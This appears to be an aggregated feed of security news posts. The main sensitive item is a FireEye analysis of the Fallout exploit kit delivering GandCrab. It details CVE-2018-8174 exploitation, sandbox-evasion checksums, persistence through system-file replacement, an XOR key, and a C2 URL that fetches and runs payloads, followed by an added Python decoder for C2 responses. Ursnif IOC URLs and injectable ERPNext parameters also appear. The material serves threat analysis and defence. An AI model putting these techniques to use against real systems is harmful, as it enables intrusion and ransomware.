hxxp://cimoselin[.]com/tst/index[.]php?l=soho4[.]tkn
hxxp://vedoriska[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://baberonto[.]com/tst/index[.]php?l=soho3[.]tkn

hxxp://hertifical[.]com/tst/index[.]php?l=soho8[.]tkn
hxxp://hertifical[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://condizer[.]com/tst/index[.]php?l=soho1[.]tkn
hxxp://vezeronu[.]com/tst/index[.]php?l=soho2[.]tkn
hxxp://vezeronu[.]com/tst/index[.]php?l=soho5[.]tkn

hxxp://zedrevo[.]com/tst/index[.]php?l=soho8[.]tkn
hxxp://zedrevo[.]com/tst/index[.]php?l=soho10[.]tkn

*Note: The first four domains above are all registered in Russia and are hosted on the IP address 185[.]212[.]44[.]114. The other domains follow the same URL pattern and are also pushing Ursnif, but no registration info is available.

The post Small businesses targeted by highly localized Ursnif campaign appeared first on Microsoft Secure.

PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program

This is the fourth post in a series of articles on understanding the Payment Card Industry Data Security Standard – PCI DSS. We want to show how PCI DSS can help anyone going through the compliance process using the PCI SAQs (Self-Assessment Questionnaires). In the previous articles we have written about PCI, we covered the following:

  • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.

Continue reading PCI for SMB: Requirement 5 & 6 – Maintain a Vulnerability Management Program at Sucuri Blog.

US charges North Korean man linked to Sony hack and WannaCry

The US Treasury Department announced today that it has sanctioned one individual and one group connected to malicious cyber activities perpetrated by North Korea's government. Park Jin Hyok, a computer programmer, was sanctioned today along with Korea Expo Joint Venture, an agency he allegedly worked for. The Treasury Department claims Hyok is part of a conspiracy responsible for the 2014 Sony Pictures hack, the 2016 Bangladesh Bank heist and last year's WannaCry ransomware attack. The Department of Justice also confirmed to reporters that it has charged Hyok with extortion, wire fraud and hacking crimes, according to Motherboard.

Source: US Treasury Department

EU Begins Formal Approval for Japan Adequacy Decision

On September 5, 2018, the European Commission (the “Commission”) announced in a press release the launch of the procedure to formally adopt the Commission’s adequacy decision with respect to Japan.

The press release notes that the EU-Japan talks on personal data protection were completed in July 2018, and announces the publication of the draft adequacy decision and related documents which, among other things, set forth the additional safeguards Japan will accord EU personal data that is transferred to Japan. According to the release, Japan is undertaking a similar formal adoption process concerning the reciprocal adequacy findings between the EU and Japan.

The adequacy decision intends to ensure that Japan provides privacy protections for EU personal data that are “essentially equivalent” to the EU standard. The key elements of the agreement include:

  • Specific safeguards to be applied by Japan to bridge the difference between EU and Japanese standards on issues such as sensitive data, onward transfer of EU data to third countries, and the right to access and rectification.
  • Enforcement by the Japan Personal Information Protection Commission.
  • Safeguards concerning access to EU personal data by Japanese public authorities for law enforcement and national security purposes.
  • A complaint-handling mechanism.

The press release also notes that the adequacy decision will complement the EU-Japan Economic Partnership Agreement by supporting free data flows between the EU and Japan and providing for privileged access to 127 million Japanese consumers.

Finally, the press release also outlines the next four steps in the formal approval process:

  • Opinion from the European Data Protection Board.
  • Consultation of a committee composed of representatives from the EU Member States (comitology procedure).
  • Update of the European Parliament Committee on Civil Liberties, Justice and Home Affairs.
  • Adoption of the adequacy decision by the College of Commissioners.

How to Protect Against Human Vulnerabilities in Your Security Program

When it comes to cybersecurity, there is no doubt that humans are the weakest link. No matter how many layers are added to your security stack, or how much phishing education and awareness training you do, threat actors continue to develop more sophisticated ways to exploit human vulnerabilities with socially engineered attacks. In fact, as security defenses keep improving, hackers are compelled to develop more clever and convincing ways to exploit the human attack surface to gain access to sensitive assets.

Your face to soon become your boarding pass at Bengaluru airport

At Bengaluru airport, you will soon no longer have to carry a boarding pass: your face will be your boarding pass. Bengaluru airport will debut facial recognition in air travel in India. The first implementation milestone of the paperless biometric self-boarding technology at the airport will be completed in the first quarter of 2019.

The move is aimed at transforming the passenger experience and creating a future-ready airport.

Aviation in India is on a big upswing in terms of passenger demand. Now, the focus is on making the entire process of getting passengers onto the plane as easy as possible. Bengaluru International Airport (BIAL) has partnered with Portuguese technology company Vision-Box to implement this smart project, the airport authority said in a tweet.

The deal was signed on Wednesday in Lisbon, Portugal in the presence of Portuguese Prime Minister Antonio Costa.

"Your face is your boarding pass," said BIAL's MD & CEO Hari Marar, describing the revolutionary technology that is set to transform air travel. “Vision-Box’s state-of-the art biometric technology, combined with its passenger flow platform will enable a seamless journey for our passengers, without obstacles, waiting for lines or hassles, from registration to boarding,” Marar added.

Vision-Box CEO Miguel Leitmann said that this will be the first end-to-end face recognition-based walkthrough experience in Asia. "We’re very proud to team up with Kempegowda International Airport, Bengaluru. We’re together raising the flag of a historical milestone, marking not only the significant improvement of the experience of those who travel through Bangalore but also the accomplishment of a seamless digital airport journey. This is the first end-to-end face recognition-based walkthrough experience in Asia and the largest in the world,” said Leitmann.

Vision-Box provided Automated Border Control and electronic identity solutions that use ICAO-compliant standards. Biometric technology will identify the passengers by their face as they move across the airport, avoiding stops and the repeated presentation of boarding passes, passports or other physical identity documents, the statement said.

Airlines like Air Asia, SpiceJet and Jet Airways may be among the early users of the technology.

Three Best Practices to Secure Critical Infrastructure

In the last few years, executives overseeing energy, utility and other industrial organizations have begun to worry about the threat of cyberattacks on our nation’s most critical infrastructures. Ten years ago, their main concerns were focused on safety or environmental risks. Back then, operators believed the virtual barricades, or air gaps, between networks and technologies were sufficient to defend against malware and cyberattacks.

DOJ will reportedly charge North Korean operative for Sony hack

The Justice Department will reportedly announce charges today against at least one North Korean operative connected to the 2014 cyberattack on Sony Pictures, the Washington Post reports. Officials told the publication that computer hacking charges would be brought against Park Jin Hyok, who is said to have worked with North Korea's military intelligence agency the Reconnaissance General Bureau. It's the first time these types of charges have been brought against an operative of North Korea.

Source: Washington Post

IDG Contributor Network: It’s time to get off the treadmill: Why you should understand adversary playbooks

When deploying prevention and detection controls, most network defenders are on a treadmill of sifting through thousands of indicators of compromise, trying to prioritize which ones they should tackle first. Typically, they know nothing about the context of the indicator, just that it is bad, and that it should be blocked somewhere in the environment. The problem is they never sift through them all, which makes them feel like they are always behind – which they are.

What the Cyber Threat Alliance and Unit 42, Palo Alto Networks' threat intelligence team, have been advocating for the past five years is to flip the equation and embrace adversary playbooks.

To read this article in full, please click here

Three Ways to Justify the IT Security Budget You Need

Communicating the return on investment (ROI) of IT security to management has traditionally been a challenge for IT professionals. IT teams are responsible for the complicated task of balancing budget limitations with strong protection that will reduce the risk of a cyberattack in today’s dynamic threat landscape. However, according to a recent Kaspersky Lab report, businesses are starting to invest more in IT security rather than treat it as a cost center.

Fallout Exploit Kit Used in Malvertising Campaign to Deliver GandCrab Ransomware

Towards the end of August 2018, FireEye identified a new exploit kit (EK) that was being served up as part of a malvertising campaign affecting users in Japan, Korea, the Middle East, Southern Europe, and other countries in the Asia Pacific region.

The first instance of the campaign was observed on Aug. 24, 2018, on the domain finalcountdown[.]gq. Tokyo-based researchers “nao_sec” identified an instance of this campaign on Aug. 29, and in their own blog post they refer to the exploit kit as Fallout Exploit Kit. As part of our research, we observed additional domains, regions, and payloads associated with the campaign. Other than SmokeLoader being distributed in Japan, which is mentioned in the nao_sec blog post, we observed GandCrab ransomware being distributed in the Middle East, which we will be focusing on in this blog post.

Fallout EK fingerprints the user browser profile and delivers malicious content if the user profile matches a target of interest. If successfully matched, the user is redirected from a genuine advertiser page, via multiple 302 redirects, to the exploit kit landing page URL. The complete chain from legit domain, cushion domains, and then to the exploit kit landing page is shown in Figure 1.


Figure 1: Malvertisement redirection to Fallout Exploit Kit landing page

The main ad page prefetches cushion domain links while loading the ad and uses the <noscript> tag to load separate links in cases where JavaScript is disabled in a browser (Figure 2).


Figure 2: Content in the first ad page

In regions not mentioned earlier in this blog post, the ‘link rel="dns-prefetch" href’ tag has a different value and the ad does not lead to the exploit kit. The complete chain of redirection via 302 hops is shown in Figures 3, 4 and 5.


Figure 3: 302 redirect to exploit kit controlled cushion servers


Figure 4: Another redirection before exploit kit landing page


Figure 5: Last redirect before user reaches exploit kit landing page

URIs for the landing page keep changing and are too generic for a pattern, making it harder for IDS solutions that rely on detections based on particular patterns.

Depending on browser/OS profiles and the location of the user, the malvertisement either delivers the exploit kit or tries to reroute the user to other social engineering campaigns. For example, in the U.S. on a fully patched macOS system, malvertising redirects users to social engineering attempts similar to those shown in Figure 6 and Figure 7.


Figure 6: Fake AV prompt for Mac users


Figure 7: Fake Flash download prompt

The strategy is consistent with the rise of social engineering attempts FireEye has been observing for some time, where bad actors use them to target users on fully patched systems, or on any OS/software profile that offers no suitable software vulnerability for an exploit attempt. The malvertisement redirect involved in the campaign has been abused heavily in many social engineering campaigns in North America as well.

FireEye Dynamic Threat Intelligence (DTI) shows that this campaign has triggered alerts from customers in the government, telecom and healthcare sectors.

Landing Page

Initially, the landing page only contained code for a VBScript vulnerability (CVE-2018-8174). However, Flash embedding code was later added for more reliable execution of the payload.

The landing page keeps the VBScript code as Base64 encoded text in the ‘<span>’ tag. It loads a JScript function when the page loads, which decodes the next stage VBScript code and executes it using the VBScript ExecuteGlobal function (Figure 8).


Figure 8: Snippet of landing page

Figure 9 shows the JScript function that decodes the malicious VBScript code.


Figure 9: Base64 decode function

Flash embedding code is inside the ‘noscript’ tag and loads only when scripts are disabled (Figure 10).


Figure 10: Flash embedding code

The decoded VBScript code exploits the CVE-2018-8174 vulnerability and executes shellcode (Figure 11).


Figure 11: Decoded VBScript

The shellcode downloads an XOR’d payload to the %temp% location, decrypts it, and executes it (Figure 12).


Figure 12: XOR binary transfer that decrypts to 4072690b935cdbfd5c457f26f028a49c

Payload Analysis (4072690b935cdbfd5c457f26f028a49c)

The malware contains PE loader code that is used for initial loading and final payload execution (Figure 13).


Figure 13: Imports resolver from the PE loader

The unpacked DLL 83439fb10d4f9e18ea7d1ebb4009bdf7 starts by initializing a structure of function pointers to the malware's core functionality (Figure 14).


Figure 14: Core structure populated with function pointers

It then enumerates all running processes, creates their crc32 checksums, and tries to match them against a list of blacklisted checksums. The list of checksums and their corresponding process names are listed in Table 1.

CRC32 Checksum   Process Name
--------------   -----------------------
99DD4432h        vmwareuser.exe
2D859DB4h        vmwareservice.exe
64340DCEh        vboxservice.exe
63C54474h        vboxtray.exe
349C9C8Bh        Sandboxiedcomlaunch.exe
5BA9B1FEh        procmon.exe
3CE2BEF3h        regmon.exe
3D46F02Bh        filemon.exe
77AE10F7h        wireshark.exe
0F344E95Dh       netmon.exe
278CDF58h        vmtoolsd.exe

Table 1: Blacklisted checksums

If any process checksums match, the malware goes into an infinite loop, effectively becoming benign from this point onward (Figure 15).


Figure 15: Blacklisted CRC32 check

If this check passes, a new thread is started in which the malware first acquires "SeShutdownPrivilege" and checks its own image path, OS version, and architecture (x86/x64). For OS version 6.3 (Windows 8.1/Windows Server 2012), the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\ctfmon.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\ctfmon.exe" with a copy of itself
  • Check whether "ctfmon.exe" is already running. If not, add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In other OS versions, the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\rundll32.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\rundll32.exe" with a copy of itself
  • Add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In either case, if the malware fails to replace the system file successfully, it copies itself to the locations listed in Table 2 and executes the copy via ShellExecuteW.

Dump Path                                                 Dump Name
-------------------------------------------------------   ----------------------
%APPDATA%\Microsoft                                       {random alphabets}.exe
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup   {random alphabets}.pif

Table 2: Alternate dump paths

On execution the malware checks if it is running as ctfmon.exe/rundll32 or as an executable in Table 2. If this check passes, the downloader branch starts executing (Figure 16).


Figure 16: Downloader code execution after image path checks

A mutex "Alphabeam ldr" is created to prevent multiple executions. Payload URL decoding then takes place: the encoded data is copied to a blob via mov operations (Figure 17).


Figure 17: Encoded URL being copied

A 32-byte multi-XOR key is set up with the algorithm shown in Figure 18.


Figure 18: XOR key generation

XOR Key (83439fb10d4f9e18ea7d1ebb4009bdf7)

{ 0x25, 0x24, 0x60, 0x67, 0x00, 0x20, 0x23, 0x65, 0x6c, 0x00, 0x2f, 0x2e, 0x6e, 0x69, 0x00, 0x2a, 0x35, 0x73, 0x76, 0x00, 0x31, 0x30, 0x74, 0x73, 0x00, 0x3c, 0x3f, 0x79, 0x78, 0x00, 0x3b, 0x3a }

Finally, the actual decoding is done using PXOR with XMM registers (Figure 19).


Figure 19: Payload URL XOR decoding

This leads the way for the downloader switch loop to execute (Figure 20).


Figure 20: Response/Download handler

Table 3 shows a breakdown of HTTP requests, their expected responses (where body = HTTP response body), and corresponding actions.

Request #  Request URL                         body+0x0    body+0x4  body+0x7            Action
---------  ----------------------------------  ----------  --------  ------------------  ------------------------------------------------------------
1          hxxp://91[.]210.104.247/update.bin  0x666555    0x0       url for request #2  Download payload via request #2, verify MZ and PE header, execute via CreateProcessW
1          hxxp://91[.]210.104.247/update.bin  0x666555    0x1       N/A                 Supposed to execute the already downloaded payload via CreateProcess. However, the functionality has been short-circuited; instead, it does nothing and continues the loop after a sleep
1          hxxp://91[.]210.104.247/update.bin  0x666555    0x2       url for request #2  Download payload via request #2, verify MZ and PE header, load it manually in native process space using its PE loader module
1          hxxp://91[.]210.104.247/update.bin  0x666555    0x3       N/A                 Supposed to execute the already downloaded payload via its PE loader. However, the functionality has been short-circuited; instead, it does nothing and continues the loop after a sleep
1          hxxp://91[.]210.104.247/update.bin  0x666555    0x4       url for request #3  Perform request #3
1          hxxp://91[.]210.104.247/update.bin  N/A         N/A       N/A                 Sleep for 10 minutes and continue from request #1
2          from response #1                    PE payload  N/A       N/A                 Execute via CreateProcessW or internal PE loader, depending on previous response
3          from response #1                    N/A         N/A       N/A                 No action taken. Sleep for 10 minutes and start with request #1

Table 3: HTTP requests, responses (body = HTTP response body), and actions

The request sequence leads to GandCrab ransomware being fetched and manually loaded into memory by the malware. Figure 21 and Figure 22 show sample request #1 and request #2 respectively, leading to the download and execution of GandCrab (8dbaf2fda5d19bab0d7c1866e0664035).
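As an added example (not FireEye's code and not the malware's own), the following Python decoder implements the request #1 response format laid out in Table 3 and the MZ/PE header check the table mentions, so an analyst can triage captured update.bin responses offline. The 1-byte command width at body+0x4 and the treatment of bytes 5-6 as padding are assumptions, and every sample body, payload and URL below is a constructed placeholder.

```python
# Added example, not FireEye's or the downloader's code.
# Assumed layout of a request #1 response body, inferred from Table 3's offsets:
#   body+0x0  4-byte little-endian DWORD, must equal 0x666555
#   body+0x4  1-byte command code 0..4 (assumption: one byte wide)
#   body+0x5  2 bytes the post does not describe (assumption: padding)
#   body+0x7  NUL-terminated URL, present only for codes 0, 2 and 4
import struct
from dataclasses import dataclass
from typing import Optional

MAGIC = 0x666555

# Command code -> what the downloader switch loop does with it (from Table 3)
ACTIONS = {
    0: "download via request #2, verify MZ/PE, run with CreateProcessW",
    1: "short-circuited: no-op, sleep, continue loop",
    2: "download via request #2, verify MZ/PE, map with internal PE loader",
    3: "short-circuited: no-op, sleep, continue loop",
    4: "perform request #3 (no action, sleep 10 minutes, restart)",
}


@dataclass
class Command:
    code: int
    url: Optional[str]
    action: str


def parse_response(body: bytes) -> Optional[Command]:
    """Decode one request #1 response body.

    Returns None for anything that does not match the format; Table 3's
    fallback for that case is to sleep 10 minutes and retry request #1.
    """
    if len(body) < 5:
        return None
    (magic,) = struct.unpack_from("<I", body, 0)
    if magic != MAGIC:
        return None
    code = body[4]
    if code not in ACTIONS:
        return None
    url = None
    if code in (0, 2, 4):
        if len(body) <= 7:
            return None  # a download command without a URL is malformed
        url = body[7:].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    return Command(code, url, ACTIONS[code])


def looks_like_pe(data: bytes) -> bool:
    """The MZ / PE signature check Table 3 says precedes payload execution."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# --- Constructed sample inputs (placeholders, not indicators from the post) ---
SAMPLE_CMD2 = (struct.pack("<I", MAGIC) + b"\x02\x00\x00"
               + b"http://payload.example.invalid/stage2.bin\x00")
SAMPLE_CMD1 = struct.pack("<I", MAGIC) + b"\x01\x00\x00"
SAMPLE_JUNK = b"<html>not a command response</html>"

# 0x48-byte buffer: DOS header with e_lfanew = 0x40, then the "PE\0\0" signature
SAMPLE_PE = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)
             + b"PE\x00\x00" + b"\x00" * 4)
SAMPLE_NOT_PE = b"MZ" + b"\x00" * 0x60  # e_lfanew = 0 points back at "MZ"


def triage(body: bytes, payload: Optional[bytes] = None) -> str:
    """Summarise what the downloader would do with a response (and payload)."""
    cmd = parse_response(body)
    if cmd is None:
        return "unrecognised body: sleep 10 minutes, retry request #1"
    line = f"cmd {cmd.code}: {cmd.action}"
    if cmd.url:
        line += f" [url={cmd.url}]"
    if cmd.code in (0, 2) and payload is not None:
        line += " payload=PE" if looks_like_pe(payload) else " payload=REJECTED"
    return line


if __name__ == "__main__":
    for name, body in (("cmd2", SAMPLE_CMD2), ("cmd1", SAMPLE_CMD1), ("junk", SAMPLE_JUNK)):
        print(name, "->", triage(body, SAMPLE_PE if name == "cmd2" else None))
```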


Figure 21: Request #1 fetching initial command sequence from payload URL


Figure 22: Request #2 downloads GandCrab ransomware that gets manually loaded into memory

Conclusion

In recent years, arrests and disruptions of underground operations have led to exploit kit activity declining heavily. Still, exploit kits pose a significant threat to users who are not running fully patched systems. Nowadays we see more exploit kit activity in the Asia Pacific region, where users tend to have more vulnerable software. Meanwhile, in North America, the focus tends to be on more straightforward social engineering campaigns.

FireEye Network Security detects all exploits, social engineering campaigns, malware, and command and control communication mentioned in this post. MVX technology used in multiple FireEye products detects the first stage and second stage malware described in this post.

Indicators of Compromise


Acknowledgements

We would like to thank Hassan Faizan for his contributions to this blog post.

Fortnite’s Google Play rebuff sparks security concerns for Android users

There’s been no small outbreak of chaos in mobile land recently, all because of an astonishingly popular game called Fortnite.

Here’s the thing: people refer to Android as “open platform,” saying that, in theory, you can do what you want with it. In practice, you buy an Android phone and then you’re locked into apps from the Google Play store. You can switch things off to allow external installs, but it’s generally not advisable, as it leaves the gate open to potentially dubious installs.

You can delve into discussions about whether Android is open source or not, but the conversation is a little more complicated and nuanced than simply answering “yes” or “no.”

With all of the above discord thrown into a melting pot and swirled around, Fortnite steps in and rattles a few more cages.

What happened?

The developers, Epic, decided that they’d rather offer the game on mobile outside of Google Play, which drastically increases the amount of revenue not nibbled at by Google. There are multiple potential issues with this:

  • Having children enable the “allow installs from unknown sources” option on an Android is a recipe for disaster. It not only means many of them will inevitably end up downloading a rogue app by mistake, it also means that those phones are now less secure than the fully locked-down Android devices out there.
  • As pointed out on Twitter, even children with legitimate installs of Fortnite onboard will eventually fall foul to something nasty because the phone is splashing around in the metaphorical malware mud.
  • Everything comes down to how well promoted the official download link is, and how efficiently the game developers tell people to only grab the game from that one specific link.
  • Epic needs to ensure they don’t fall victim to sophisticated SEO scams pointing links away from their site and toward bad downloads, and also that their site security is top notch. If the page is compromised, a rogue download link might be waiting in the wings.

That’s how the initial landscape looked shortly after Epic’s announcement, and many predicted things would quickly go horribly wrong.

Did things go horribly wrong?

They most certainly did. In the end, it wasn’t even a rogue app causing mayhem but an issue found with Fortnite’s installer that allowed for the possibility of rogue apps onboard to hijack the installer and install their own junkware. The so-called “Man in the Disk” attack looks for apps not locking down external storage as well as they should, and quickly gets to work exploiting things happening under the hood.

The uproar over the installer kerfuffle was rounded off with a bit of a fierce debate on Twitter, because that’s what happens with everything in life now.

What happens next?

Whether they like it or not, Epic are now the standard bearer for “app developer going off range into the (incredibly wealthy and insecure) wilderness.” I don’t believe an Android app has attracted quite this much attention before, and that’s without throwing the no Google Play install angle into the mix.

What they’re also stuck with is the realization that for as long as they continue to remain outside of the Google Play ecosystem, stories will come back to haunt them regarding malware installs masquerading as the real thing, social engineering tricks convincing children to download dodgy Fortnite add-ons from Russian servers, and potential SEO poisoning leading would-be gamers astray.

Google Play certainly isn’t perfect, and plenty of rogue apps have been found lurking there through the years. I think most security professionals would argue it’s still an awful lot riskier to switch off the unknown source install ban than it is to visit Play and grab an app, though.

Let’s also not single out Epic on this one; it’s not just game developers taking tentative steps into the world of unknown installs—even mobile phone providers do it. About four or five years ago, I replaced my phone and took out a package deal with a well-known UK retailer. Part of the deal was “six free games for your Android.” Sounds great, right? Except I quickly realized that to get the games, you had to enable unknown source installs and download the six .APK files directly from the phone provider’s website.

At no point did anyone say anything about how turning off a security feature of the phone I’d just been sold was a bad idea. Nothing in the literature provided mentioned anything beyond, “Wow, turning this off is a really good idea, free games! Wow!” This is also at a time when I was regularly writing about fake Angry Birds/Flappy Bird downloads hosted on Russian websites.

Once installed (via dragging and dropping from desktop to mobile through the magic of USB cables), those fake bird-themed games would typically try and perform premium rate SMS shenanigans. This only worked because some people were running around with unknown source installs permitted, and they’d still have to try and social engineer the ones that weren’t into turning it on.

Unknown installs: so hot right now

Now we’re at a point where unknown source installs are not only mainstream but currently attached to the wheels of an absolute gaming juggernaut. There are serious security issues that Epic needs to consider, and it’s going to be fascinating looking back in six to 12 months and deciding if promoting unknown source installs in this way caused a maelstrom of security headaches from all sides, or a large pile of “absolutely nothing much happened.”

If it’s the latter, you can bet more developers will want to take advantage of this method. Then the threat landscape will become significantly more complicated in mobile land.

The post Fortnite’s Google Play rebuff sparks security concerns for Android users appeared first on Malwarebytes Labs.

Hazards Ahead: The Dangers of Runaway Technology

Technology has advanced at an astonishing rate in the last decade, and the pace is only set to accelerate. Capabilities that seemed impossible only a short time ago will develop extremely quickly, aiding those who see them coming and hindering those who don’t. Developments in smart technology will create new possibilities for organizations of all kinds – but they will also create opportunities for attackers and adversaries by reducing the effectiveness of existing controls. Previously well-protected information will become vulnerable.

Collaborate Confidently With Analyst Notes in Recorded Future

In today’s workplace, teams are often spread out across geographies. While that makes for an effective way to conduct global business across multiple time zones, it also often makes collaborative work more difficult. Especially with the time-sensitive work that security professionals do on a daily basis, the ability to collaborate effectively is fundamental to a team’s success.

Analyst Notes is a capability within Recorded Future that enables teams, no matter where they’re located, to collaborate with one another through private notes visible only within their organization. When researching alerts or trying to understand more about a threat actor, this capability is enormously helpful in allowing teams to document their findings about a potential threat and communicate them to the larger team, saving everyone from having to produce duplicative work.

Adding Analyst Note

Adding an Analyst Note to an Intelligence Card.

Analyst Note Free Text

Free text within an Analyst Note goes through Recorded Future’s natural language processing, creating linked entities and automatic context.

A unique aspect of the Analyst Notes capability is that with our natural language processing abilities, all notes that you input into Recorded Future become a contextualized part of your Recorded Future instance. Rather than your notes remaining static, they become a dynamic part of your threat intelligence, extending your knowledge beyond one note.

Intelligence Card

Final Analyst Note in an Intelligence Card.

In an industry where time can be the difference between your organization being protected and being compromised, every minute counts. No matter what solution you use, the ability to collaborate with fellow team members should be a fundamental part of your security strategy, helping you save time, operate more effectively, and better protect your organization.

To learn more about using Recorded Future for team collaboration on analysis findings, request a personalized demo.

The post Collaborate Confidently With Analyst Notes in Recorded Future appeared first on Recorded Future.


Vulnerability Spotlight: TALOS-2018-0560 – ERPNext SQL Injection Vulnerabilities

Vulnerabilities discovered by Yuri Kramar from the Cisco Security Advisor Team


Overview

Talos is disclosing multiple SQL injection vulnerabilities in the Frappe ERPNext Version 10.1.6 application. Frappe ERPNext is an open-source enterprise resource planning (ERP) cloud application. These vulnerabilities enable an attacker to bypass authentication and get unauthenticated access to sensitive data. An attacker can use a normal web browser to trigger these vulnerabilities — no special tools are required.

Details

The vulnerabilities were assigned to the CVE IDs CVE-2018-3882 - CVE-2018-3885. An attacker can use the following parameters for SQL injection:

CVE-2018-3882 - searchfield parameter
query=erpnext.controllers.queries.

CVE-2018-3883 - employee parameter
cmd=erpnext.hr.doctype.leave_application.leave_application.

CVE-2018-3883 - sort_order parameter
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3884 - sort_by parameter 
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3884 - start parameter
cmd=erpnext.stock.dashboard.item_dashboard.

CVE-2018-3885
cmd=frappe.desk.reportview.

More technical details can be found in the Talos vulnerability reports.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rule: 46165-46172

19-Year-Old Hacker Arrested Over Making Hoax School and Flight Bomb Threats

British police have arrested a 19-year-old teen who is an alleged member of Apophis Squad cybercriminal group responsible for making hoax bomb threats to thousands of schools and airlines; and DDoSing ProtonMail and Tutanota secure email services. George Duke-Cohan was arrested in his bedroom at his family home in Watford by British National Crime Agency (NCA) on 31st August and pledged

CISSP Certification Course — Become An IT Security Professional

If you dream of making it big in the IT security community, the CISSP certification is a necessary milestone. Certified Information Systems Security Professional (CISSP) is a globally recognised certification in the field of information security, which has become a gold standard of achievement that is acknowledged worldwide. CISSP certification deals with a range of information security

In Ulyanovsk, the Deputy Director was detained for hacking the Education Management Server

FSB officers detained the Deputy Director of the school in Ulyanovsk on suspicion of illegal access to information resources of the City Education Department.

According to the reports, the Deputy Director of the school in December last year hacked the Department's server, deleted all the data of students and teachers, accounting records, emails and modified the software.

During the interrogation, the detainee admitted that he was offended and angry at the unfair attitude of the management to him, and he decided to take revenge.

A criminal case has been opened against the man. He faces up to 5 years in prison.

The hacker's lawyer said that the court can cancel the criminal prosecution and assign the defendant a fine of $7,320, as the man pleaded guilty.

Gartner SOAR Adoption Rate Prediction: From 1% to 15% by 2020 – Why Should You Care?

In a recent report, Gartner predicted that SOAR adoption rates will rise from 1% to 15% by 2020. These findings highlight two key factors. Firstly, acceptable SOAR protocols are currently lacking in most corporations. Secondly, SOAR tools are gaining in traction and popularity as market validation occurs. The anticipated leap to 15% adoption in under two years is evidence of this.

SOAR tools are quickly emerging and will have a major impact on business.

What Exactly is SOAR?

The purpose of Security Orchestration, Automation, and Response (SOAR) tools is to allow companies to mitigate rising security threats quickly. Adopting SOAR tools will ensure that corporations are better prepared to identify and isolate potential threats before they become a serious issue. SOAR tools allow companies to be proactive as well as reactive in the fight against cybercrime.

Gartner defines SOAR as technologies that allow companies to collect all types of security threats, alerts, and data from various sources and analyze and respond to them in one place. Using SOAR tools, organizations can identify and eliminate duplicates and false positives, which allows security analysts to focus on real threats most efficiently. By leveraging human expertise and the time savings afforded by automation and orchestration, decision-making and reaction times can be significantly faster.

One of the main challenges in the cybersecurity industry today is detection of cyber threats. Dwell times are currently estimated to average six months. This means that malware and other malicious code can be entrenched in a company’s ecosystem, gathering information long before the unthinkable happens. Speed is of the essence when it comes to combating bad actors. SOAR tools allow companies to clearly define incident management and response as well as implement these processes at scale.

Why SOAR and Why Now?

Cybercrime is a pressing and rising problem, costing the global economy an estimated $450 billion a year. As new technologies evolve to fight cyber criminals, so too do the tactics and agility of the perpetrators. The average company is simply unprepared to deal with this impending threat. Building a larger firewall will only cause the attacker to go out and look for a longer metaphorical ladder.

One only has to look at disastrous high profile cases like Equifax to see the implications of major hacking attacks. As attackers become better at finding new methods of cracking passwords or breaking firewalls, traditional security technologies are being left in the dust. Worse still, many security operations rely primarily on manually created documentation and outdated protocols, tools, and processes. Security teams that are ramping up investments against cybercrime are often dispersed and disorganized. They have a plethora of tools at their fingertips, but no cohesive way of using them to effectively eradicate the threat.

SOAR is proving to be a vital way of giving security professionals a roadmap to predict, prevent, and tackle threats effectively. Orchestration provides a vital conduit to unify security tools and their actions in common windows, automation allows repetitive tasks to be executed at machine speed, and incident management provides full visibility across the attack lifecycle.

SOAR Market Validation

Market validation is beginning to occur as SOAR tools are being increasingly adopted by key players. Microsoft's acquisition of Hexadite, Splunk's acquisition of Phantom, and IBM taking over Resilient Systems will help to speed up widespread adoption of SOAR as companies large and small follow in their footsteps.

Moreover, as more security organizations are faced with the challenges of limited resources and a lack of talent in cyberspace, there is a growing need to harness technology to automate and streamline workflows. Not only will SOAR tools help to resolve the talent gap, but their adoption will also reduce costs and expedite response.

Conclusion

If corporations around the globe keep dragging their heels in the fight against cybercrime, they run the risk of losing money and suffering reputational damage. SOAR tools allow for an effective way of fighting security threats through a central collection of intelligence that can be quickly transformed into action.

As has been showcased by multiple public data breaches and filled column inches, security threats are omnipresent. Organizing an efficient response through sophisticated tools that scale companies’ resources, improve response times, and automate mundane security tasks will be vital to thwart attackers.

About the author: Rishi Bhargava is a co-founder of Demisto. A creative thinker and problem solver, Rishi has been building and managing successful enterprise products for many years. Making things “simple” is really hard. Rishi believes simplicity in every aspect will delight Demisto customers and has made it the guiding principle.

Copyright 2010 Respective Author at Infosec Island

BitTorrent launches uTorrent Web for simple torrenting experience

uTorrent Web is the next generation of torrenting from BitTorrent

BitTorrent, Inc., the company behind the world’s most popular P2P communications protocol, has officially released the first version of µTorrent Web to help users quickly download and play torrent files inside their browser.

µTorrent Web (not to be confused with uTorrent) is a Web-based torrent client for Windows that aims to make torrenting simpler and, most importantly, supports torrent streaming.

“Our vision for µTorrent Web was to build a torrent client with quick playability and simplicity at its core,” said BitTorrent, Inc. in a press release statement.

“Through years of serving the BitTorrent community with products used by hundreds of millions of users, we took our passion and experience to build a torrent client that meets the streaming demands of today’s users.”

